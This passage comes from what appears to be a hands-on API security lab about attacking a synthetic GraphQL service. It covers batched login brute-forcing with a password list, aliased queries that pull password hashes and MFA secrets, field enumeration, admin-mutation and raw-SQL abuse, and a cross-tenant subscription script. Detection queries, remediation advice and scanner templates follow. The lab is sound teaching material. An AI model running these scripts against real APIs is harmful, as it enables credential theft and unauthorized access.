  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": {"token": "eyJhbGciOiJSUzI1NiJ9.SYNTHETIC_ADMIN_TOKEN"}}},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]}
]

Critical Finding: Batching Enables Brute-Force

The GraphQL endpoint processes batch requests with multiple authentication mutations in a single HTTP request. Since rate limiting is applied per-request rather than per-operation, an attacker can send 100-1000 login attempts in each request. This completely bypasses the authentication rate limit of 10/minute. This is API4:2023 — Unrestricted Resource Consumption combined with API2:2023 — Broken Authentication.

Large-Scale Batching Script

# Batched brute-force via GraphQL (SYNTHETIC - educational only)
import requests
import json

GRAPHQL_URL = "https://graphql.example.com/query"
TARGET_USER = "admin"
BATCH_SIZE = 100

# Load wordlist (SYNTHETIC)
passwords = [
    "password", "password1", "123456", "admin", "letmein",
    "welcome", "monkey", "dragon", "master", "qwerty",
    "REDACTED", "changeme", "test1234", "admin123", "root",
    # ... truncated for brevity — in practice, thousands of passwords
]

def batch_login(usernames_passwords, batch_num):
    """Send a batch of login mutations."""
    queries = []
    for i, (username, password) in enumerate(usernames_passwords):
        queries.append({
            "query": f'mutation {{ login(username: "{username}", password: "{password}") {{ token }} }}',
            "operationName": None,
            "variables": None
        })

    response = requests.post(
        GRAPHQL_URL,
        headers={"Content-Type": "application/json"},
        json=queries,
        timeout=30
    )

    results = response.json()
    for i, result in enumerate(results):
        if result.get("data", {}).get("login", {}).get("token"):
            username, password = usernames_passwords[i]
            print(f"\n[!!!] CREDENTIAL FOUND in batch {batch_num}:")
            print(f"      Username: {username}")
            print(f"      Password: {'*' * len(password)}")  # Don't print actual password
            return True

    return False

# Process in batches
print(f"[*] Target: {TARGET_USER}")
print(f"[*] Passwords: {len(passwords)}")
print(f"[*] Batch size: {BATCH_SIZE}")
print(f"[*] Total requests: {len(passwords) // BATCH_SIZE + 1}")

for batch_start in range(0, len(passwords), BATCH_SIZE):
    batch = [(TARGET_USER, p) for p in passwords[batch_start:batch_start + BATCH_SIZE]]
    batch_num = batch_start // BATCH_SIZE + 1
    print(f"[*] Sending batch {batch_num} ({len(batch)} attempts)...", end=" ", flush=True)

    found = batch_login(batch, batch_num)
    if found:
        break
    print("No match")

Aliased Query Batching

# Use aliases to batch multiple operations within a single query
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ u1: user(id: \"user-1001\") { username email role credentials { passwordHash mfaSecret } } u2: user(id: \"user-1002\") { username email role credentials { passwordHash mfaSecret } } u3: user(id: \"user-1003\") { username email role credentials { passwordHash mfaSecret } } u4: user(id: \"user-9001\") { username email role credentials { passwordHash mfaSecret } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "u1": {
      "username": "testuser",
      "email": "testuser@example.com",
      "role": "user",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_HASH_1",
        "mfaSecret": "JBSWY3DPEHPK3PXP"
      }
    },
    "u2": {
      "username": "jane.smith",
      "email": "jane.smith@example.com",
      "role": "user",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_HASH_2",
        "mfaSecret": "KRSXG5DJMFWXA4TP"
      }
    },
    "u3": {
      "username": "bob.wilson",
      "email": "bob.wilson@example.com",
      "role": "user",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_HASH_3",
        "mfaSecret": "NZSWYZLONFQWS3TP"
      }
    },
    "u4": {
      "username": "admin",
      "email": "admin@novatech.example.com",
      "role": "admin",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_ADMIN_HASH",
        "mfaSecret": "GEZDGNBVGY3TQOJQ"
      }
    }
  }
}

Critical Finding: Aliased Batch Data Extraction

Using GraphQL aliases, an attacker can query multiple users' sensitive data in a single request. This bypasses per-query rate limiting and extracts password hashes and MFA secrets for all users. Combined with the lack of authorization on the credentials field, this enables complete credential theft. This is both API1:2023 — Broken Object Level Authorization and API3:2023 — Broken Object Property Level Authorization.

Step 5.4: Field Suggestion Exploitation

Enumerate Fields via Suggestions (No Introspection Needed)

# Even if introspection is disabled, GraphQL servers often suggest field names
# Test with intentionally misspelled field names
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ me { passwor } }"
  }' | jq '.errors[0].message'

Expected Output (Synthetic):

"Cannot query field \"passwor\" on type \"User\". Did you mean \"passwordHash\", \"passwordResetToken\", or \"passwordChangedAt\"?"
# Enumerate more fields through suggestions
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ me { secre } }"
  }' | jq '.errors[0].message'

Expected Output (Synthetic):

"Cannot query field \"secre\" on type \"User\". Did you mean \"secretKey\", \"securityQuestions\", or \"secretApiToken\"?"

Automated Field Enumeration via Suggestions

# Automated field enumeration using suggestions (SYNTHETIC - educational only)
import requests
import json
import re

GRAPHQL_URL = "https://graphql.example.com/query"
HEADERS = {
    "Content-Type": "application/json",
    "Authorization": "Bearer SYNTHETIC_TOKEN_HERE"
}

# Prefixes to test for field enumeration
prefixes = [
    "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
    "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
    "pass", "secret", "token", "key", "admin", "internal", "debug",
    "config", "credential", "hash", "mfa", "otp", "session", "role",
    "permission", "billing", "credit", "ssn", "tax"
]

discovered_fields = set()

for prefix in prefixes:
    query = f'{{ me {{ {prefix}XXXXXX }} }}'
    response = requests.post(
        GRAPHQL_URL,
        headers=HEADERS,
        json={"query": query}
    )

    result = response.json()
    errors = result.get("errors", [])

    for error in errors:
        message = error.get("message", "")
        # Extract suggested field names
        suggestions = re.findall(r'Did you mean "([^"]+)"', message)
        for suggestion in suggestions:
            if suggestion not in discovered_fields:
                discovered_fields.add(suggestion)
                print(f"[+] Discovered field: {suggestion} (from prefix: {prefix})")

print(f"\n[*] Total fields discovered: {len(discovered_fields)}")
print(f"[*] Fields: {sorted(discovered_fields)}")

Expected Output (Synthetic):

[+] Discovered field: address (from prefix: a)
[+] Discovered field: apiKeys (from prefix: a)
[+] Discovered field: adminNotes (from prefix: a)
[+] Discovered field: billingAccount (from prefix: b)
[+] Discovered field: credentials (from prefix: c)
[+] Discovered field: configOverrides (from prefix: c)
[+] Discovered field: debugMode (from prefix: d)
[+] Discovered field: email (from prefix: e)
[+] Discovered field: hashAlgorithm (from prefix: h)
[+] Discovered field: internalId (from prefix: i)
[+] Discovered field: mfaSecret (from prefix: m)
[+] Discovered field: passwordHash (from prefix: pass)
[+] Discovered field: passwordResetToken (from prefix: pass)
[+] Discovered field: passwordChangedAt (from prefix: pass)
[+] Discovered field: role (from prefix: r)
[+] Discovered field: secretKey (from prefix: secret)
[+] Discovered field: secretApiToken (from prefix: secret)
[+] Discovered field: securityQuestions (from prefix: secret)
[+] Discovered field: sessionTokens (from prefix: session)
[+] Discovered field: ssnEncrypted (from prefix: ssn)
[+] Discovered field: tenant (from prefix: t)
[+] Discovered field: tokenExpiry (from prefix: token)

[*] Total fields discovered: 22
[*] Fields: ['address', 'adminNotes', 'apiKeys', 'billingAccount', 'configOverrides', 'credentials', 'debugMode', 'email', 'hashAlgorithm', 'internalId', 'mfaSecret', 'passwordChangedAt', 'passwordHash', 'passwordResetToken', 'role', 'secretApiToken', 'secretKey', 'securityQuestions', 'sessionTokens', 'ssnEncrypted', 'tenant', 'tokenExpiry']

Finding: Field Suggestions Leak Schema

Even without introspection, the GraphQL server's field suggestion feature reveals sensitive field names including passwordHash, mfaSecret, secretApiToken, ssnEncrypted, and passwordResetToken. This is API8:2023 — Security Misconfiguration — the suggestion feature should be disabled in production.

Step 5.5: GraphQL Authorization Bypass

Test Resolver-Level Authorization

# Test if the user resolver enforces authorization on sensitive fields
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ user(id: \"user-9001\") { username role credentials { passwordHash mfaSecret } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "user": {
      "username": "admin",
      "role": "admin",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_ADMIN_HASH",
        "mfaSecret": "GEZDGNBVGY3TQOJQ"
      }
    }
  }
}

Critical Finding: No Field-Level Authorization

A standard user can query the admin's password hash and MFA secret through the GraphQL API. The resolvers do not implement field-level authorization — any authenticated user can access any field on any object. This is API1:2023 — Broken Object Level Authorization at the field level.

Test Mutation Authorization

# Test if standard user can execute admin-only mutations
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "mutation { updateTenantConfig(tenantId: \"tenant-001\", config: { maxUsers: 999999, features: [\"unlimited_storage\", \"api_access\", \"admin_panel\"] }) { id config { maxUsers features } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "updateTenantConfig": {
      "id": "tenant-001",
      "config": {
        "maxUsers": 999999,
        "features": ["unlimited_storage", "api_access", "admin_panel"]
      }
    }
  }
}

Finding: Mutation Authorization Bypass

A standard user can modify tenant configuration through the updateTenantConfig mutation, which should be restricted to platform administrators. This enables self-provisioning of unlimited users, storage, and admin panel access. This is API5:2023 — Broken Function Level Authorization.

Execute Raw SQL via GraphQL Mutation

# Test the executeQuery mutation (discovered via introspection)
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "mutation { executeQuery(sql: \"SELECT username, email, role FROM users LIMIT 5\") { rows columns } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "executeQuery": {
      "columns": ["username", "email", "role"],
      "rows": [
        ["testuser", "testuser@example.com", "user"],
        ["jane.smith", "jane.smith@example.com", "user"],
        ["bob.wilson", "bob.wilson@example.com", "user"],
        ["admin", "admin@novatech.example.com", "admin"],
        ["svc-analytics", "svc@novatech.example.com", "service"]
      ]
    }
  }
}

Critical Finding: Raw SQL Execution via GraphQL

The executeQuery mutation allows any authenticated user to execute arbitrary SQL queries against the database. This provides complete database access including data extraction, modification, and potential OS-level command execution via database functions. This is the most severe finding in the assessment — it combines API5:2023, API8:2023, and essentially provides full database compromise.

Step 5.6: GraphQL Subscription Abuse

# Test for WebSocket-based subscription sniffing
# GraphQL subscriptions use WebSocket protocol

# Check if subscriptions are available
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ __schema { subscriptionType { fields { name description args { name type { name } } } } } }"
  }' | jq '.data.__schema.subscriptionType.fields[] | {name, args: [.args[].name]}'

Expected Output (Synthetic):

{
  "name": "auditEvents",
  "args": ["tenantId"]
}
{
  "name": "fileChanges",
  "args": ["projectId"]
}
{
  "name": "userActivity",
  "args": ["userId"]
}
{
  "name": "systemAlerts",
  "args": []
}
# Subscribe to audit events across tenants (SYNTHETIC - educational only)
import asyncio
import websockets
import json

async def subscribe_audit():
    """Subscribe to audit events for another tenant."""
    uri = "wss://graphql.example.com/ws"

    async with websockets.connect(
        uri,
        extra_headers={"Authorization": "Bearer SYNTHETIC_TOKEN_HERE"}
    ) as websocket:
        # Initialize WebSocket connection
        init_msg = json.dumps({
            "type": "connection_init",
            "payload": {"Authorization": "Bearer SYNTHETIC_TOKEN_HERE"}
        })
        await websocket.send(init_msg)

        # Subscribe to tenant-002's audit events (cross-tenant)
        subscribe_msg = json.dumps({
            "id": "1",
            "type": "subscribe",
            "payload": {
                "query": """
                    subscription {
                        auditEvents(tenantId: "tenant-002") {
                            timestamp
                            userId
                            action
                            resource
                            details
                            ipAddress
                        }
                    }
                """
            }
        })
        await websocket.send(subscribe_msg)

        # Listen for events
        print("[*] Listening for tenant-002 audit events...")
        while True:
            response = await websocket.recv()
            event = json.loads(response)
            if event.get("type") == "next":
                data = event["payload"]["data"]["auditEvents"]
                print(f"[+] Event: {data['action']} by {data['userId']}")
                print(f"    Resource: {data['resource']}")
                print(f"    IP: {data['ipAddress']}")
                print(f"    Time: {data['timestamp']}")
                print()

asyncio.run(subscribe_audit())

Detection & Defense — Exercise 5

KQL Detection: GraphQL Introspection

// Detect GraphQL introspection queries
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has "graphql" or URL has "/query"
| where RequestBody has "__schema" or RequestBody has "__type" or RequestBody has "introspectionQuery"
| project TimeGenerated, ClientIP, URL, UserAgent, StatusCode
| summarize IntrospectionAttempts = count() by ClientIP, bin(TimeGenerated, 5m)
| where IntrospectionAttempts > 0

KQL Detection: GraphQL Batching Attacks

// Detect GraphQL batching attacks
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has "graphql" or URL has "/query"
| where RequestBody startswith "["  // Array = batch request
| extend BatchSize = countof(RequestBody, '"query"')
| where BatchSize > 5
| project TimeGenerated, ClientIP, URL, BatchSize, StatusCode
| summarize
    TotalBatches = count(),
    MaxBatchSize = max(BatchSize),
    TotalOperations = sum(BatchSize)
    by ClientIP, bin(TimeGenerated, 5m)
| where TotalOperations > 50

KQL Detection: Deep/Complex Query Abuse

// Detect overly complex GraphQL queries
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has "graphql" or URL has "/query"
| extend QueryDepth = countof(RequestBody, "{")
| extend QueryLength = strlen(RequestBody)
| extend ResponseTime_ms = ResponseTime
| where QueryDepth > 8 or QueryLength > 5000 or ResponseTime_ms > 10000
| project TimeGenerated, ClientIP, QueryDepth, QueryLength, ResponseTime_ms, StatusCode
| summarize
    ComplexQueries = count(),
    MaxDepth = max(QueryDepth),
    MaxLength = max(QueryLength),
    MaxResponseTime = max(ResponseTime_ms)
    by ClientIP, bin(TimeGenerated, 5m)

KQL Detection: Field Suggestion Enumeration

// Detect field enumeration via GraphQL suggestions
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has "graphql" or URL has "/query"
| where StatusCode == 200
| where ResponseBody has "Did you mean"
| summarize
    SuggestionResponses = count(),
    UniqueQueries = dcount(RequestBody)
    by ClientIP, bin(TimeGenerated, 5m)
| where SuggestionResponses > 10

SPL Detection: GraphQL Attack Patterns

index=api_logs sourcetype=api_access uri_path="/query" OR uri_path="*graphql*"
| eval is_introspection=if(match(request_body, "__schema|__type|introspectionQuery"), 1, 0)
| eval is_batch=if(match(request_body, "^\["), 1, 0)
| eval query_depth=mvcount(split(request_body, "{")) - 1
| eval query_length=len(request_body)
| eval attack_type=case(
    is_introspection=1, "introspection",
    is_batch=1, "batching",
    query_depth > 8, "deep_query",
    query_length > 5000, "complex_query",
    match(request_body, "executeQuery|impersonate|resetPassword"), "sensitive_mutation",
    1=1, "normal")
| search attack_type!="normal"
| stats count as attempts, values(attack_type) as attack_types,
        max(query_depth) as max_depth by src_ip, span=5m _time
| sort -attempts

Defensive Recommendations

Securing GraphQL APIs

  1. Disable introspection in production — introspection should only be available in development environments
  2. Implement query depth limiting — reject queries exceeding a maximum depth (e.g., 7 levels)
  3. Implement query complexity analysis — assign costs to fields and reject queries exceeding a complexity budget (e.g., 1000 points)
  4. Disable or limit batching — either disable array-based batch requests or limit the number of operations per batch (e.g., 5)
  5. Disable field suggestions in production — prevent schema enumeration through error messages
  6. Implement field-level authorization — use middleware/directives to enforce access control on sensitive fields (@auth(requires: ADMIN))
  7. Remove dangerous mutationsexecuteQuery, impersonateUser, and clearCache should never be exposed through a public API; use internal admin tooling instead
  8. Implement query allowlisting (persisted queries) — in production, only allow pre-registered query hashes, rejecting arbitrary queries
  9. Set query timeout limits — abort queries that exceed a reasonable execution time (e.g., 5 seconds)
  10. Rate limit by operation, not by request — count each operation in a batch separately against rate limits
  11. Use DataLoader patterns — prevent N+1 query issues that amplify the impact of deep/wide queries

Cross-Reference

For application security architecture patterns that prevent these issues by design, see Chapter 30: Application Security. For integrating GraphQL security testing into CI/CD pipelines, see Chapter 35: DevSecOps Pipeline.


Comprehensive Findings Summary

Findings by Severity

# Severity Finding OWASP API 2023 Exercise
1 Critical Raw SQL execution via GraphQL mutation API5, API8 5
2 Critical SSRF to cloud metadata — IAM credential theft API7 3
3 Critical Algorithm None attack — complete auth bypass API2 2
4 Critical Cross-tenant BOLA — tenant isolation broken API1 2
5 Critical Mass assignment — role escalation to admin API3 3
6 Critical Aliased batch credential extraction (hashes + MFA) API1, API3 5
7 Critical Debug endpoints expose database credentials API8 1
8 Critical Legacy v1 API — unsigned token forgery API2, API9 2
9 High BOLA — user profile enumeration API1 2
10 High Excessive data exposure — password hashes, MFA secrets API3 3
11 High Function-level auth bypass — user impersonation API5 2
12 High Blind SQL injection in sort parameter API8 3
13 High Race condition — coupon double-spend API6 4
14 High Race condition — financial overdraft API6 4
15 High GraphQL introspection exposes full schema API8 5
16 High Batching attack bypasses auth rate limit API4, API2 5
17 High No GraphQL query depth/complexity limits API4 5
18 High OAuth2 redirect URI validation bypass API2 2
19 High OAuth2 scope escalation API2 2
20 Medium Rate limit bypass via X-Forwarded-For API4 4
21 Medium Rate limit bypass via URL encoding API4 4
22 Medium No rate limiting on v1 API API4, API9 4
23 Medium Payment step bypass in order workflow API6 4
24 Medium Negative quantity creates account credits API6 4
25 Medium Mass assignment — subscription upgrade bypass API3, API6 3
26 Medium Field suggestion leaks schema details API8 5
27 Medium GraphQL mutation authorization bypass API5 5
28 Medium No file upload size limits API4 4
29 Medium No pagination size limits API4 4
30 Low Server/framework version disclosure API8 1
31 Low Wildcard CORS policy API8 1
32 Low Stack traces in error responses API8 1
33 Low Verbose error messages reveal SQL queries API8 1
34 Low GraphQL subscription cross-tenant access API1 5

OWASP API Security Top 10 2023 Coverage

Category Findings Status
API1:2023 — Broken Object Level Authorization 4, 9, 6, 34 Tested
API2:2023 — Broken Authentication 3, 8, 16, 18, 19 Tested
API3:2023 — Broken Object Property Level Authorization 5, 10, 6, 25 Tested
API4:2023 — Unrestricted Resource Consumption 16, 17, 20, 21, 22, 28, 29 Tested
API5:2023 — Broken Function Level Authorization 11, 1, 27 Tested
API6:2023 — Unrestricted Access to Sensitive Business Flows 13, 14, 23, 24, 25 Tested
API7:2023 — Server Side Request Forgery 2 Tested
API8:2023 — Security Misconfiguration 7, 12, 15, 26, 30, 31, 32, 33 Tested
API9:2023 — Improper Inventory Management 8, 22 Tested
API10:2023 — Unsafe Consumption of APIs (Not directly tested) Noted

MITRE ATT&CK Mapping

Technique ID Technique Name Exercises
T1190 Exploit Public-Facing Application 2, 3, 5
T1078 Valid Accounts 2
T1550.001 Application Access Token 2
T1087 Account Discovery 1, 2
T1069 Permission Groups Discovery 1, 5
T1046 Network Service Discovery 3
T1552.001 Credentials In Files 1, 3, 5
T1552.004 Private Keys 1
T1530 Data from Cloud Storage 3
T1213 Data from Information Repositories 3, 5
T1071.001 Application Layer Protocol: Web All
T1059 Command and Scripting Interpreter 5
T1098 Account Manipulation 2, 3
T1548 Abuse Elevation Control Mechanism 2, 3
T1499 Endpoint Denial of Service 4, 5
T1557 Adversary-in-the-Middle 2

Remediation Priority Matrix

Immediate Action Required (P0 — Fix Within 24 Hours)

  1. Disable debug endpoints — Remove /v2/debug/* routes from production
  2. Remove executeQuery GraphQL mutation — This provides unrequited database access
  3. Fix JWT algorithm validation — Hardcode RS256, reject none and HS* algorithms
  4. Implement SSRF protections — Block internal IP ranges and metadata endpoints
  5. Remove UserCredentials from GraphQL schema — Never expose password hashes or MFA secrets

High Priority (P1 — Fix Within 1 Week)

  1. Implement object-level authorization — Add tenant and ownership checks to every endpoint
  2. Fix mass assignment — Use explicit allowlists for writable fields on PATCH/PUT endpoints
  3. Implement response filtering — Create DTOs that exclude sensitive fields
  4. Disable GraphQL introspection — Only enable in development environments
  5. Fix rate limiting — Rate limit by authenticated identity, normalize URLs first
  6. Decommission v1 API — Or apply JWT authentication and rate limiting
  7. Fix OAuth2 redirect URI validation — Enforce exact match on registered URIs

Medium Priority (P2 — Fix Within 1 Month)

  1. Implement GraphQL query complexity limits — Set depth, complexity, and batch size limits
  2. Fix race conditions — Use database-level locks and idempotency keys
  3. Validate business logic — Enforce workflow state machines, reject negative quantities
  4. Implement file upload limits — Set per-file and per-tenant storage limits
  5. Implement pagination limits — Cap per_page at a reasonable maximum
  6. Disable GraphQL field suggestions — Prevent schema enumeration
  7. Sanitize error responses — Remove stack traces, SQL queries, and internal paths

Tools and Automation

API Security Testing Checklist

Use this checklist for future API security assessments:

## Pre-Engagement
- [ ] Scope definition (endpoints, methods, auth mechanisms)
- [ ] Test accounts provisioned across roles and tenants
- [ ] Emergency contacts and communication plan established

## Reconnaissance
- [ ] OpenAPI/Swagger specification retrieved and analyzed
- [ ] Undocumented endpoints discovered (fuzzing)
- [ ] Legacy/shadow API versions identified
- [ ] Technology stack fingerprinted
- [ ] Error response verbosity analyzed

## Authentication
- [ ] JWT algorithm confusion tested (none, RS256→HS256)
- [ ] JWT kid parameter injection tested
- [ ] Token expiration and refresh flow tested
- [ ] OAuth2 redirect URI validation tested
- [ ] OAuth2 scope escalation tested
- [ ] API key entropy and rotation tested

## Authorization
- [ ] BOLA on all CRUD endpoints tested
- [ ] Cross-tenant access tested
- [ ] Function-level authorization (admin endpoints) tested
- [ ] Mass assignment tested on all PATCH/PUT endpoints

## Injection & Data Exposure
- [ ] SQL injection in all parameters tested
- [ ] NoSQL injection in search/filter parameters tested
- [ ] SSRF via URL parameters tested
- [ ] Excessive data exposure analyzed
- [ ] Sensitive fields in responses identified

## Rate Limiting & Business Logic
- [ ] Rate limit configuration mapped
- [ ] Rate limit bypass techniques tested
- [ ] Race conditions on critical operations tested
- [ ] Business logic flaws tested
- [ ] Resource exhaustion limits tested

## GraphQL (if applicable)
- [ ] Introspection availability tested
- [ ] Query depth limits tested
- [ ] Query complexity limits tested
- [ ] Batching attacks tested
- [ ] Field suggestion enumeration tested
- [ ] Resolver-level authorization tested
- [ ] Subscription authorization tested

## Reporting
- [ ] All findings mapped to OWASP API Top 10 2023
- [ ] All findings mapped to MITRE ATT&CK
- [ ] Remediation priorities assigned
- [ ] Detection queries provided
- [ ] Retesting plan defined

Nuclei Templates for API Security

# nuclei-api-debug-endpoints.yaml (SYNTHETIC - educational only)
id: api-debug-endpoints
info:
  name: API Debug Endpoints Exposure
  author: NovaTech Security Team
  severity: critical
  description: Detects exposed debug endpoints in API deployments
  tags: api, misconfiguration, debug

requests:
  - method: GET
    path:
      - "{{BaseURL}}/debug/config"
      - "{{BaseURL}}/debug/routes"
      - "{{BaseURL}}/debug/query"
      - "{{BaseURL}}/debug/sql-stats"
      - "{{BaseURL}}/internal/metrics"
      - "{{BaseURL}}/actuator"
      - "{{BaseURL}}/actuator/env"
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "database"
          - "password"
          - "secret"
          - "connection_string"
        condition: or
# nuclei-graphql-introspection.yaml (SYNTHETIC - educational only)
id: graphql-introspection
info:
  name: GraphQL Introspection Enabled
  author: NovaTech Security Team
  severity: high
  description: Detects enabled GraphQL introspection in production
  tags: api, graphql, misconfiguration

requests:
  - method: POST
    path:
      - "{{BaseURL}}/graphql"
      - "{{BaseURL}}/query"
      - "{{BaseURL}}/api/graphql"
    headers:
      Content-Type: application/json
    body: '{"query":"{ __schema { types { name } } }"}'
    matchers:
      - type: word
        words:
          - "__schema"
          - "types"
        condition: and
      - type: status
        status:
          - 200

Burp Suite Extension Configuration for API Testing

# Burp Suite extension helper for API security testing (SYNTHETIC - educational only)
# Save as api_security_checks.py and load in Burp Extender

"""
API Security Active Scan Checks:
1. JWT algorithm confusion
2. BOLA via ID manipulation
3. Mass assignment detection
4. GraphQL introspection check
5. SSRF via URL parameters
"""

from burp import IBurpExtender, IScannerCheck
from java.io import PrintWriter
import re
import base64
import json

class BurpExtender(IBurpExtender, IScannerCheck):

    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("API Security Checks (Synthetic)")
        callbacks.registerScannerCheck(self)

        self.stdout = PrintWriter(callbacks.getStdout(), True)
        self.stdout.println("API Security Checks loaded (SYNTHETIC)")

    def doPassiveScan(self, baseRequestResponse):
        issues = []

        response = baseRequestResponse.getResponse()
        response_info = self._helpers.analyzeResponse(response)
        headers = response_info.getHeaders()
        body = self._helpers.bytesToString(
            response[response_info.getBodyOffset():]
        )

        # Check for excessive data exposure indicators
        sensitive_patterns = [
            r'"password_hash"', r'"mfa_secret"', r'"api_key"',
            r'"secret_key"', r'"ssn"', r'"credit_card"',
            r'"\$2[aby]\$\d+\$'  # bcrypt hash pattern
        ]

        for pattern in sensitive_patterns:
            if re.search(pattern, body, re.IGNORECASE):
                # Report issue (implementation details omitted for brevity)
                self.stdout.println(f"[!] Sensitive data pattern found: {pattern}")

        return issues

    def doActiveScan(self, baseRequestResponse, insertionPoint):
        # Active checks would go here
        return []

Lab Wrap-Up

Key Takeaways

  1. API security requires defense-in-depth — no single control prevents all attacks. Authentication, authorization, input validation, rate limiting, and output filtering must all work together.

  2. GraphQL introduces unique attack surfaces — introspection, batching, query complexity, and field suggestions create attack vectors that do not exist in REST APIs. GraphQL APIs require specialized security controls.

  3. Legacy APIs are a hidden risk — the v1 API with weak authentication was the easiest path to compromise. API inventory management and version decommissioning are critical security practices.

  4. OWASP API Top 10 2023 provides a practical framework — every finding in this lab maps to at least one OWASP API category. Use it as a testing checklist and a remediation guide.

  5. Business logic flaws cannot be found by scanners — race conditions, workflow manipulation, and negative value abuse require manual testing and deep understanding of the application's business rules.

  6. Mass assignment is pervasive and underestimated — when APIs accept arbitrary JSON fields without allowlisting, attackers can modify protected properties including roles, subscription tiers, and tenant associations.

  7. SSRF in API features is high-impact — any API feature that makes server-side HTTP requests (webhooks, integrations, imports) is a potential SSRF vector that can reach cloud metadata services and internal infrastructure.

Skills Practiced

Skill Exercises Tools Used
API reconnaissance and documentation analysis 1 curl, ffuf, kiterunner, jq
JWT token analysis and manipulation 2 jwt_tool, Python PyJWT
Authorization testing (BOLA, BFLA) 2, 5 curl, Python requests
SQL injection via API 3 sqlmap, curl
Mass assignment testing 3 curl, Burp Suite
SSRF exploitation 3 curl, Python requests
Rate limit analysis and bypass 4 curl, Python asyncio
Race condition exploitation 4 Python asyncio/aiohttp
Business logic testing 4 curl, Burp Suite
GraphQL security testing 5 curl, InQL, Python
Detection rule writing (KQL/SPL) All Sentinel, Splunk

Further Reading

Related Chapters and Resources


What's Next?

After completing this lab, test your knowledge with the Chapter 30 Quiz and explore the Purple Team API Security Exercises for collaborative red/blue team scenarios targeting API infrastructure.